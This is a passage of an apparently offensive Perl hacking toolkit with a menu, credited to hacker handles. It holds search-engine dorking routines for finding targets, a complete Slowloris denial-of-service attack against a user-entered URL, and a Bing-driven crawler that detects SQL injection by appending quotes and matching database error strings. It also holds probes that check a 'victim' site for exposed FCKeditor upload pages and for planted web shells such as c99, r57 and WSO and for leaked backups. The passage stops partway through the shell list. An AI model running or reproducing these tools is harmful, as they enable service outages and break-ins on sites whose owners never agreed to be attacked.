2161. my $key = $_[0];
2162. my $b = 0;
2163. for (my $i=1; $i<=200; $i+=100) {
2164. my $search = ("http://it.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2165. my $res = &search_engine_query($search);
2166. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2167. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2168. }
2169. }
2170. } return @list;
2171. }
2172.  
2173. sub turki() {
2174. my @list;
2175. my $key = $_[0];
2176. my $b = 0;
2177. for (my $i=1; $i<=200; $i+=100) {
2178. my $search = ("http://tr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2179. my $res = &search_engine_query($search);
2180. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2181. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2182. }
2183. }
2184. } return @list;
2185. }
2186.  
2187. sub polandia() {
2188. my @list;
2189. my $key = $_[0];
2190. my $b = 0;
2191. for (my $i=1; $i<=200; $i+=100) {
2192. my $search = ("http://pl.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2193. my $res = &search_engine_query($search);
2194. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2195. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2196. }
2197. }
2198. } return @list;
2199. }
2200.  
2201. sub filipina() {
2202. my @list;
2203. my $key = $_[0];
2204. my $b = 0;
2205. for (my $i=1; $i<=200; $i+=100) {
2206. my $search = ("http://ph.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2207. my $res = &search_engine_query($search);
2208. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2209. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2210. }
2211. }
2212. } return @list;
2213. }
2214.  
2215. sub inggris() {
2216. my @list;
2217. my $key = $_[0];
2218. my $b = 0;
2219. for (my $i=1; $i<=200; $i+=100) {
2220. my $search = ("http://uk.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2221. my $res = &search_engine_query($search);
2222. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2223. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2224. }
2225. }
2226. } return @list;
2227. }
2228.  
2229. sub peru() {
2230. my @list;
2231. my $key = $_[0];
2232. my $b = 0;
2233. for (my $i=1; $i<=200; $i+=100) {
2234. my $search = ("http://pe.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2235. my $res = &search_engine_query($search);
2236. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2237. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2238. }
2239. }
2240. } return @list;
2241. }
2242.  
2243. sub hongkong() {
2244. my @list;
2245. my $key = $_[0];
2246. my $b = 0;
2247. for (my $i=1; $i<=200; $i+=100) {
2248. my $search = ("http://hk.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2249. my $res = &search_engine_query($search);
2250. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2251. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2252. }
2253. }
2254. } return @list;
2255. }
2256.  
2257. sub yunani() {
2258. my @list;
2259. my $key = $_[0];
2260. my $b = 0;
2261. for (my $i=1; $i<=200; $i+=100) {
2262. my $search = ("http://gr.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2263. my $res = &search_engine_query($search);
2264. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2265. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2266. }
2267. }
2268. } return @list;
2269. }
2270.  
2271. sub finlandia() {
2272. my @list;
2273. my $key = $_[0];
2274. my $b = 0;
2275. for (my $i=1; $i<=200; $i+=100) {
2276. my $search = ("http://fi.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2277. my $res = &search_engine_query($search);
2278. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2279. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2280. }
2281. }
2282. } return @list;
2283. }
2284.  
2285. sub kolombia() {
2286. my @list;
2287. my $key = $_[0];
2288. my $b = 0;
2289. for (my $i=1; $i<=200; $i+=100) {
2290. my $search = ("http://co.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2291. my $res = &search_engine_query($search);
2292. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2293. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2294. }
2295. }
2296. } return @list;
2297. }
2298.  
2299. sub taiwan() {
2300. my @list;
2301. my $key = $_[0];
2302. my $b = 0;
2303. for (my $i=1; $i<=200; $i+=100) {
2304. my $search = ("http://tw.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2305. my $res = &search_engine_query($search);
2306. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2307. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2308. }
2309. }
2310. } return @list;
2311. }
2312.  
2313. sub swiss() {
2314. my @list;
2315. my $key = $_[0];
2316. my $b = 0;
2317. for (my $i=1; $i<=200; $i+=100) {
2318. my $search = ("http://ch.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2319. my $res = &search_engine_query($search);
2320. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2321. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2322. }
2323. }
2324. } return @list;
2325. }
2326.  
2327. sub mexico() {
2328. my @list;
2329. my $key = $_[0];
2330. my $b = 0;
2331. for (my $i=1; $i<=200; $i+=100) {
2332. my $search = ("http://mx.search.yahoo.com/search?n=100&p=".uri_escape($key)."&b=".$i);
2333. my $res = &search_engine_query($search);
2334. while ($res =~ m/http\%3a\/\/(.+?)\//g) {
2335. if ($1 !~ /yahoo\.com/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
2336. }
2337. }
2338. } return @list;
2339. }
2340. ################################################
2341. sub search_engine_query() {
2342. my $url = $_[0];
2343. $url =~ s/http:\/\///;
2344. my $host = $url;
2345. my $query = $url;
2346. my $page = "";
2347. $host =~ s/href=\"?http:\/\///;
2348. $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
2349. $query =~ s/$host//;
2350. if ($query eq "") { $query = "/"; }
2351. eval {
2352. my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;
2353. my $sget = "GET $query HTTP/1.0\r\n";
2354. $sget .= "Host: $host\r\n";
2355. $sget .= "Accept: */*\r\n";
2356. $sget .= "User-Agent: $uagent\r\n";
2357. $sget .= "Connetion: Close\r\n\r\n";
2358. print $sock $sget;
2359. my @pages = <$sock>;
2360. $page = "@pages";
2361. close($sock);
2362. };
2363. return $page;
2364. }
2365.  
2366. sub clean() {
2367. my @cln = ();
2368. my %visit = ();
2369. foreach my $element (@_) {
2370. $element =~ s/\/+/\//g;
2371. next if $visit{$element}++;
2372. push @cln, $element;
2373. }
2374. return @cln;
2375. }
2376.  
2377. sub links() {
2378. my @l;
2379. my $link=$_[0];
2380. my $host=$_[0];
2381. my $hdir=$_[0];
2382. $hdir=~s/(.*)\/[^\/]*$/\1/;
2383. $host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
2384. $host.="/";
2385. $link.="/";
2386. $hdir.="/";
2387. $host=~s/\/\//\//g;
2388. $hdir=~s/\/\//\//g;
2389. $link=~s/\/\//\//g;
2390. push(@l,$link,$host,$hdir);
2391. return @l;
2392. }
2393.  
2394. sub getcontent() {
2395. my $url = $_[0];
2396. my $req = HTTP::Request->new(GET => $url);
2397. my $ua = LWP::UserAgent->new();
2398. $ua->timeout(15);
2399. my $response = $ua->request($req);
2400. return $response->content;
2401. }
2402.  
2403. sub printlog {
2404. my ($logsec,$logmin,$loghour,$logmday,$logmon,$logyear,$logwday,$logyday,$logisdst)=localtime(time);
2405. my $logtimestamp = sprintf("%4d-%02d-%02d,%02d:%02d:%02d",$logyear+1900,$logmon+1,$logmday,$loghour,$logmin,$logsec);
2406. $logmon++;
2407. $logyear=$logyear+1900;
2408. my $log="[$logdir$logyear-$logmon-$logmday]SQLscan.log";
2409. open(lo,">>$log") or die "$log:$!";
2410. print lo @_[0];
2411. close(lo);
2412. return;
2413. }}
2414. }
2415. if($targett eq '11')
2416. {
2417. system('cls');
2418. system('title FckEditor Dir Tester');
2419. {
2420. use HTTP::Request;
2421. use LWP::UserAgent;
2422.  
2423. system('cls');
2424. system(' Title FckEditor Dir Tester');
2425. system "color a";
2426. print"\n";
2427. print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
2428. print "\t> FCK Editor Dir Tester >\n";
2429. print "\t> >\n";
2430. print "\t> coded By amiral >\n";
2431. print "\t> amiral | benz >\n";
2432. print "\t> Result In FckEditor.txt >\n";
2433. print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
2434. print "\n";
2435.  
2436. print " Enter The Site\n\n Example: www.victim.com \n\n-> ";
2437.  
2438.  
2439. $site=<STDIN>;
2440. chomp $site;
2441.  
2442. if($site !~ /http:\/\//) { $site = "http://$site/"; };
2443.  
2444. print "\n";
2445.  
2446. @path = ('/editor/editor/filemanager/connectors/uploadtest.html',
2447. '/editor/editor/filemanager/upload/test.html',
2448. '/editor/editor/filemanager/browser/default/connectors/test.html',
2449. '/editor/editor/filemanager/connectors/test.html',
2450. '/admin/fckeditor/editor/filemanager/connectors/test.html',
2451. '/FCKeditor/editor/filemanager/upload/test.html',
2452. '/Fckeditor/editor/filemanager/browser/default/connectors/test.html',
2453. '/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html',
2454. '/admin/FCKeditor/editor/filemanager/upload/test.html',
2455. '/Fckeditor/editor/filemanager/connectors/test.html',
2456. '/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html',
2457. '/FCKeditor/editor/filemanager/connectors/uploadtest.html',
2458. '/js/fckeditor/editor/filemanager/connectors/test.html',
2459. '/admin/FCKeditor/editor/filemanager/connectors/test.html',
2460. '/admin/FCKeditor/editor/fckeditor.html',
2461. '/include/fckeditor/_samples/default.html',
2462. '/include/fckeditor/editor/filemanager/connectors/test.html',);
2463.  
2464.  
2465. foreach $fckeditor(@path){
2466.  
2467. $url = $site.$fckeditor;
2468. $req = HTTP::Request->new(GET=>$url);
2469. $useragent = LWP::UserAgent->new();
2470.  
2471. $response = $useragent->request($req);
2472.  
2473. if ($response->is_success){
2474. print "$fckeditor\n";
2475. $url = substr($url, $fckeditor + 13);
2476. $fckeditor = substr($url, 0, index($url, '"'));
2477. open (txt,">>FckEditor.txt");
2478. print txt $fckeditor,"\n";
2479. close(txt);
2480. print "=> Dir Found : $url\n";
2481. }
2482. else {
2483. print "=> Not Found : $fckeditor\n";
2484. }}
2485. }}
2486. if($targett eq '16')
2487. {
2488. system('cls');
2489. system('title DDOS');
2490. {
2491. use strict;
2492. use IO::Socket::INET;
2493. use IO::Socket::SSL;
2494. use Getopt::Long;
2495. use Config;
2496.  
2497.  
2498. $SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
2499.  
2500.  
2501. my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
2502. my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
2503. my $result = GetOptions(
2504. 'shost=s' => \$shost,
2505. 'dns=s' => \$host,
2506. 'httpready' => \$httpready,
2507. 'num=i' => \$connections,
2508. 'cache' => \$cache,
2509. 'port=i' => \$port,
2510. 'https' => \$ssl,
2511. 'tcpto=i' => \$tcpto,
2512. 'test' => \$test,
2513. 'timeout=i' => \$timeout,
2514. 'version' => \$version,
2515. );
2516.  
2517. print "[+] Enter Url For DDOS: ";
2518. chomp ($host = <STDIN>);
2519.  
2520. if ($version) {
2521. print "Version 0.7\n";
2522. exit;
2523. }
2524.  
2525. unless ($port) {
2526. $port = 80;
2527. print "Defaulting to port 80.\n";
2528. }
2529.  
2530.  
2531. unless ($tcpto) {
2532. $tcpto = 5;
2533. print "Defaulting to a 5 second tcp connection timeout.\n";
2534. }
2535.  
2536.  
2537. unless ($test) {
2538. unless ($timeout) {
2539. $timeout = 100;
2540. print "Defaulting to a 100 second re-try timeout.\n";
2541. }
2542. unless ($connections) {
2543. $connections = 1000;
2544. print "Defaulting to 1000 connections.\n";
2545. }
2546. }
2547.  
2548.  
2549. my $usemultithreading = 0;
2550. if ( $Config{usethreads} ) {
2551. print "Multithreading enabled.\n";
2552. $usemultithreading = 1;
2553. use threads;
2554. use threads::shared;
2555. }
2556. else {
2557. print "No multithreading capabilites found!\n";
2558. print "Slowloris will be slower than normal as a result.\n";
2559. }
2560.  
2561.  
2562. my $packetcount : shared = 0;
2563. my $failed : shared = 0;
2564. my $connectioncount : shared = 0;
2565.  
2566.  
2567. srand() if ($cache);
2568.  
2569.  
2570. if ($shost) {
2571. $sendhost = $shost;
2572. }
2573. else {
2574. $sendhost = $host;
2575. }
2576. if ($httpready) {
2577. $method = "POST";
2578. }
2579. else {
2580. $method = "GET";
2581. }
2582.  
2583.  
2584. if ($test) {
2585. my @times = ( "2", "30", "90", "240", "500" );
2586. my $totaltime = 0;
2587. foreach (@times) {
2588. $totaltime = $totaltime + $_;
2589. }
2590. $totaltime = $totaltime / 60;
2591. print "This test could take up to $totaltime minutes.\n";
2592.  
2593.  
2594. my $delay = 0;
2595. my $working = 0;
2596. my $sock;
2597.  
2598.  
2599. if ($ssl) {
2600. if (
2601. $sock = new IO::Socket::SSL(
2602. PeerAddr => "$host",
2603. PeerPort => "$port",
2604. Timeout => "$tcpto",
2605. Proto => "tcp",
2606. )
2607. )
2608. {
2609. $working = 1;
2610. }
2611. }
2612. else {
2613. if (
2614. $sock = new IO::Socket::INET(
2615. PeerAddr => "$host",
2616. PeerPort => "$port",
2617. Timeout => "$tcpto",
2618. Proto => "tcp",
2619. )
2620. )
2621. {
2622. $working = 1;
2623. }
2624. }
2625. if ($working) {
2626. if ($cache) {
2627. $rand = "?" . int( rand(99999999999999) );
2628. }
2629. else {
2630. $rand = "";
2631. }
2632. my $primarypayload =
2633. "GET /$rand HTTP/1.1\r\n"
2634. . "Host: $sendhost\r\n"
2635. . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
2636. . "Content-Length: 42\r\n";
2637. if ( print $sock $primarypayload ) {
2638. print "Connection successful, now comes the waiting game...\n";
2639. }
2640. else {
2641. print
2642. "That's odd - I connected but couldn't send the data to $host:$port.\n";
2643. print "Is something wrong?\nDying.\n";
2644. exit;
2645. }
2646. }
2647. else {
2648. print "Uhm... I can't connect to $host:$port.\n";
2649. print "Is something wrong?\nDying.\n";
2650. exit;
2651. }
2652. for ( my $i = 0 ; $i <= $#times ; $i++ ) {
2653. print "Trying a $times[$i] second delay: \n";
2654. sleep( $times[$i] );
2655. if ( print $sock "X-a: b\r\n" ) {
2656. print "\tWorked.\n";
2657. $delay = $times[$i];
2658. }
2659. else {
2660. if ( $SIG{__WARN__} ) {
2661. $delay = $times[ $i - 1 ];
2662. last;
2663. }
2664. print "\tFailed after $times[$i] seconds.\n";
2665. }
2666. }
2667.  
2668.  
2669. if ( print $sock "Connection: Close\r\n\r\n" ) {
2670. print "Okay that's enough time. Slowloris closed the socket.\n";
2671. print "Use $delay seconds for -timeout.\n";
2672. exit;
2673. }
2674. else {
2675. print "Remote server closed socket.\n";
2676. print "Use $delay seconds for -timeout.\n";
2677. exit;
2678. }
2679. if ( $delay < 166 ) {
2680. print <<EOSUCKS2BU;
2681. Since the timeout ended up being so small ($delay seconds) and it generally
2682. takes between 200-500 threads for most servers and assuming any latency at
2683. all... you might have trouble using Slowloris against this target. You can
2684. tweak the -timeout flag down to less than 10 seconds but it still may not
2685. build the sockets in time.
2686. EOSUCKS2BU
2687. }
2688. }
2689. else {
2690. print
2691. "Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
2692.  
2693.  
2694. if ($usemultithreading) {
2695. domultithreading($connections);
2696. }
2697. else {
2698. doconnections( $connections, $usemultithreading );
2699. }
2700. }
2701.  
2702.  
2703. sub doconnections {
2704. my ( $num, $usemultithreading ) = @_;
2705. my ( @first, @sock, @working );
2706. my $failedconnections = 0;
2707. $working[$_] = 0 foreach ( 1 .. $num ); #initializing
2708. $first[$_] = 0 foreach ( 1 .. $num ); #initializing
2709. while (1) {
2710. $failedconnections = 0;
2711. print "\t\tBuilding sockets.\n";
2712. foreach my $z ( 1 .. $num ) {
2713. if ( $working[$z] == 0 ) {
2714. if ($ssl) {
2715. if (
2716. $sock[$z] = new IO::Socket::SSL(
2717. PeerAddr => "$host",
2718. PeerPort => "$port",
2719. Timeout => "$tcpto",
2720. Proto => "tcp",
2721. )
2722. )
2723. {
2724. $working[$z] = 1;
2725. }
2726. else {
2727. $working[$z] = 0;
2728. }
2729. }
2730. else {
2731. if (
2732. $sock[$z] = new IO::Socket::INET(
2733. PeerAddr => "$host",
2734. PeerPort => "$port",
2735. Timeout => "$tcpto",
2736. Proto => "tcp",
2737. )
2738. )
2739. {
2740. $working[$z] = 1;
2741. $packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
2742. }
2743. else {
2744. $working[$z] = 0;
2745. }
2746. }
2747. if ( $working[$z] == 1 ) {
2748. if ($cache) {
2749. $rand = "?" . int( rand(99999999999999) );
2750. }
2751. else {
2752. $rand = "";
2753. }
2754. my $primarypayload =
2755. "$method /$rand HTTP/1.1\r\n"
2756. . "Host: $sendhost\r\n"
2757. . "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
2758. . "Content-Length: 42\r\n";
2759. my $handle = $sock[$z];
2760. if ($handle) {
2761. print $handle "$primarypayload";
2762. if ( $SIG{__WARN__} ) {
2763. $working[$z] = 0;
2764. close $handle;
2765. $failed++;
2766. $failedconnections++;
2767. }
2768. else {
2769. $packetcount++;
2770. $working[$z] = 1;
2771. }
2772. }
2773. else {
2774. $working[$z] = 0;
2775. $failed++;
2776. $failedconnections++;
2777. }
2778. }
2779. else {
2780. $working[$z] = 0;
2781. $failed++;
2782. $failedconnections++;
2783. }
2784. }
2785. }
2786. print "\t\tSending data.\n";
2787. foreach my $z ( 1 .. $num ) {
2788. if ( $working[$z] == 1 ) {
2789. if ( $sock[$z] ) {
2790. my $handle = $sock[$z];
2791. if ( print $handle "X-a: b\r\n" ) {
2792. $working[$z] = 1;
2793. $packetcount++;
2794. }
2795. else {
2796. $working[$z] = 0;
2797. #debugging info
2798. $failed++;
2799. $failedconnections++;
2800. }
2801. }
2802. else {
2803. $working[$z] = 0;
2804. #debugging info
2805. $failed++;
2806. $failedconnections++;
2807. }
2808. }
2809. }
2810. print
2811. "Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
2812. sleep($timeout);
2813. }
2814. }
2815.  
2816.  
2817. sub domultithreading {
2818. my ($num) = @_;
2819. my @thrs;
2820. my $i = 0;
2821. my $connectionsperthread = 50;
2822. while ( $i < $num ) {
2823. $thrs[$i] =
2824. threads->create( \&doconnections, $connectionsperthread, 1 );
2825. $i += $connectionsperthread;
2826. }
2827. my @threadslist = threads->list();
2828. while ( $#threadslist > 0 ) {
2829. $failed = 0;
2830. }}
2831. }}
2832. if($targett eq '3')
2833. {
2834. system('cls');
2835. system('title Dorker Bing');
2836. {
2837. use strict;
2838. use warnings;
2839. use HTTP::Request;
2840. use LWP::UserAgent;
2841.  
2842. ###############
2843. my $dork;
2844. my $url;
2845. my $i;
2846. my $request;
2847. my $useragent;
2848. my $response;
2849. my $start;
2850. my $end;
2851. my $result;
2852. my $fl;
2853. my $link;
2854. my $req;
2855. my $ua;
2856. my $result2;
2857. my $res;
2858. my $save;
2859. my $pages;
2860. my $page;
2861. my $choice;
2862. ##############
2863. my @z;
2864.  
2865. print q{
2866. ################################
2867. ## / SQLi Crawler / ##
2868. ## amiralousteam ##
2869. ## ~ReCoded by miral ##
2870. ################################
2871.  
2872. };
2873.  
2874. MainMenu:
2875.  
2876. print "------------------------\n";
2877. print "Enter [1] To Begin SQLi.\n";
2878. print "Enter [2] To Exit.\n";
2879. print "------------------------\n\n";
2880. print "Your Choice: ";
2881.  
2882. chomp ($choice = <STDIN>);
2883. print "\n";
2884.  
2885. if ($choice eq 1) {&sql_scan}
2886. if ($choice eq 5) {die;}
2887.  
2888. sub sql_scan
2889. {
2890.  
2891. print "[+] Enter Bing! dork: ";
2892. chomp ($dork = <STDIN>);
2893. print "\n";
2894. print "[+] How Many Pages To Leech?: ";
2895. chomp ($pages = <STDIN>);
2896. print "\n";
2897.  
2898. $page = $pages.'1';
2899.  
2900. print "[~] Crawling...\n\n";
2901.  
2902. for ($i = 0; $i <= $page; $i=$i+11)
2903. {
2904.  
2905. $url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";
2906.  
2907. $request = HTTP::Request->new(GET => $url);
2908. $useragent = LWP::UserAgent->new();
2909. $response = $useragent->request($request);
2910. $result = $response->content;
2911.  
2912. $start = '<h3><a href="';
2913. $end = '" onmousedown=';
2914.  
2915. while ($result =~ m/$start(.*?)$end/g)
2916.  
2917. {
2918. $fl = $1;
2919. $link = $fl."%27";
2920. $req = HTTP::Request->new(GET => $link);
2921. $ua = LWP::UserAgent->new();
2922. $res = $ua->request($req);
2923. $result2 = $res->content;
2924.  
2925. if ($result2=~ m/You have an error in your SQL syntax/i || $result2=~ m/Query failed/i || $result2=~ m/SQL query failed/i || $result2=~ m/mysql_fetch_/i || $result2=~ m/mysql_fetch_array/i || $result2 =~ m/mysql_num_rows/i || $result2 =~ m/The used SELECT statements have a different number of columns/i )
2926. {
2927. push @z, $link;
2928. print "[+] MySQL Vulnerable: $link\n\n";
2929. }
2930.  
2931. elsif ($result2 =~ m/Microsoft JET Database/i || $result2 =~ m/ODBC Microsoft Access Driver/i )
2932. {
2933. push @z, $link;
2934. print "[+] MsSQL Vulnerable: $link\n\n";
2935. }
2936.  
2937. else {
2938.  
2939. print "[-] $link <- Not Vulnerable\n\n";
2940. }
2941. }
2942.  
2943. }
2944. print "Vulnerable Links:\n";
2945. print "-----------------------------------\n";
2946. foreach (@z)
2947. {
2948. print "$_ \n\n";
2949. }
2950. print "Save Into A Text File? (Y or N): ";
2951. chomp ($save = <STDIN>);
2952.  
2953. if ($save eq 'Y')
2954. {
2955. print "Saving File...\n\n";
2956. open(vuln_file, ">>Vulns.txt");
2957. foreach (@z)
2958. {
2959. print vuln_file "$_ \n";
2960. }
2961. close(vuln_file);
2962. print "File Saved!\n\n";
2963. }
2964. goto MainMenu;
2965. }}
2966. }
2967. if($targett eq '1')
2968. {
2969. system('cls');
2970. system('title Dir Finder');
2971. {
2972. print " Shell Finder \n";
2973. use HTTP::Request;
2974. use LWP::UserAgent;
2975.  
2976. system('cls');
2977. system('title Dir Finder Rec0ded by amiral');
2978. print"\n";
2979. print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
2980. print "\t> Shell Finder blackCodeX >\n";
2981. print "\t> C0ded by amiral >\n";
2982. print "\t> Greetz to .mr wolf >\n";
2983. print "\t> SEA | TEAM >\n";
2984. print "\t> Result In Done.txt >\n";
2985. print "\t>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n";
2986. print "\n";
2987.  
2988. print " Scan Your site Site\n\n Example: www.victim.com \n\n-> ";
2989.  
2990.  
2991. $site=<STDIN>;
2992. chomp $site;
2993.  
2994. if($site !~ /http:\/\//) { $site = "http://$site/"; };
2995.  
2996. print "\n";
2997.  
2998. @path = ('WSO.php','dz.php','w.php','wp-content/plugins/akismet/akismet.php','images/stories/w.php','w.php','shell.php','cpanel.php','cpn.php','sql.php','mysql.php','config. ? php','configuration.php','madspot.php','Cgishell.pl','killer.php','changeall.php ? ','2.php','Sh3ll.php','dz0.php','dam.php','user.php','dom.php','whmcs.php','r00t ? .php','1.php','a.php','r0k.php','abc.php','egy.php','syrian_shell.php','xxx.php' &#8203; ,'settings.php','tmp.php','cyber.php','c99.php','r57.php','404.php','gaza.php',' ? 1.php','d4rk.php','index1.php','nkr.php','xd.php','M4r0c.php','Dz.php','sniper.p ? hp','ksa.php','v4team.php','offline.php','priv8.php','911.php','madspotshell.php ? ','c100.php','sym.php','cp.php','tmp/cpn.php','tmp/w.php','tmp/r57.php','tmp/king.php','tmp/sok.php','tmp/ss.php','tmp/as.php','tmp/dz.php','tmp/r1z.php','tmp/whmcs.php','tmp/root.php','tmp/r00t.php','templates/beez/index.php','templates/beez/beez.php','templates/rhuk_milkyway/index.php','tmp/uploads.php','tmp/upload.php','tmp/sa.php','sa.php','readme.php','tmp/readme.php','wp.zip'.'wp-content/plugins/disqus-comment-system/disqus.php',
2999. 'd0mains.php','wp-content/plugins/akismet/akismet.php','madspotshell.php','info.php','egyshell.php','Sym.php','c22.php','c ?100.php',
3000. 'wp-content/plugins/akismet/admin.php#','configuration.php','g.php','wp-content/plugins/google-sitemap-generator/sitemap-core.php#',
3001. 'wp-content/plugins/akismet/widget.php#','xx.pl','ls.php','Cpanel.php','k.php','zone-h.php','tmp/user.php','tmp/Sym.php','cp.php',
3002. 'tmp/madspotshell.php','tmp/root.php','tmp/whmcs.php','tmp/index.php','tmp/2.php','tmp/dz.php','tmp/cpn.php',
3003. 'tmp/changeall.php','tmp/Cgishell.pl','tmp/sql.php','0day.php','tmp/admin.php','cliente/downloads/h4xor.php',
3004. 'whmcs/downloads/dz.php','L3b.php','d.php','tmp/d.php','tmp/L3b.php','wp-content/plugins/akismet/admin.php',
3005. 'templates/rhuk_milkyway/index.php','templates/beez/index.php','sado.php','admin1.php','upload.php','up.php','vb.zip','vb.rar',
3006. 'admin2.asp','uploads.php','sa.php','sysadmins/','admin1/','sniper.php','administration/Sym.php','images/Sym.php',
3007. '/r57.php','/wp-content/plugins/disqus-comment-system/disqus.php','gzaa_spysl','sql-new.php','/shell.php','/sa.php','/admin.php',
3008. '/sa2.php','/2.php','/gaza.php','/up.php','/upload.php','/uploads.php','/templates/beez/index.php','shell.php','/amad.php',
3009. '/t00.php','/dz.php','/site.rar','/Black.php','/site.tar.gz','/home.zip','/home.rar','/home.tar','/home.tar.gz',
3010. '/forum.zip','/forum.rar','/forum.tar','/forum.tar.gz','/test.txt','/ftp.txt','/user.txt','/site.txt','/error_log','/error',
3011. '/cpanel','/awstats','/site.sql','/vb.sql','/forum.sql','r00t-s3c.php','c.php','/backup.sql','/back.sql','/data.sql','wp.rar/',
3012. 'wp-content/plugins/disqus-comment-system/disqus.php','asp.aspx','/templates/beez/index.php','tmp/vaga.php',
3013. 'tmp/killer.php','whmcs.php','abuhlail.php','tmp/killer.php','tmp/domaine.pl','tmp/domaine.php','useradmin/',
3014. 'tmp/d0maine.php','d0maine.php','tmp/sql.php','X.php','123.php','m.php','b.php','up.php','tmp/dz1.php','dz1.php','forum.zip','Symlink.php','Symlink.pl',
3015. 'forum.rar','joomla.zip','joomla.rar','wp.php','buck.sql','sysadmin.php','images?/c99.php', 'xd.php', 'c100.php',
3016. 'spy.aspx','xd.php','tmp/xd.php','sym/root/home/','billing/killer.php','tmp/upload.php','tmp/admin.php',
3017. 'Server.php','tmp/uploads.php','tmp/up.php','Server/','wp-admin/c99.php','tmp/priv8.php','priv8.php','cgi.pl/',
3018. 'tmp/cgi.pl','downloads/dom.php','templates/ja-helio-farsi/index.php','webadmin.html','admins.php',
3019. '/wp-content/plugins/count-per-day/js/yc/d00.php','bluff.php','king.jeen','admins/','admins.asp','admins.php','wp.zip','/wp-content/plugins/disqus-comment-system/WSO.php',
3020. '/wp-content/plugins/disqus-comment-system/dz.php',
3021. '/wp-content/plugins/disqus-comment-system/DZ.php',
3022. '/wp-content/plugins/disqus-comment-system/cpanel.php',
3023. '/wp-content/plugins/disqus-comment-system/cpn.php',
3024. '/wp-content/plugins/disqus-comment-system/sos.php',
3025. '/wp-content/plugins/disqus-comment-system/term.php',
3026. '/wp-content/plugins/disqus-comment-system/Sec-War.php',
3027. '/wp-content/plugins/disqus-comment-system/sql.php',
3028. '/wp-content/plugins/disqus-comment-system/ssl.php',
3029. '/wp-content/plugins/disqus-comment-system/mysql.php',
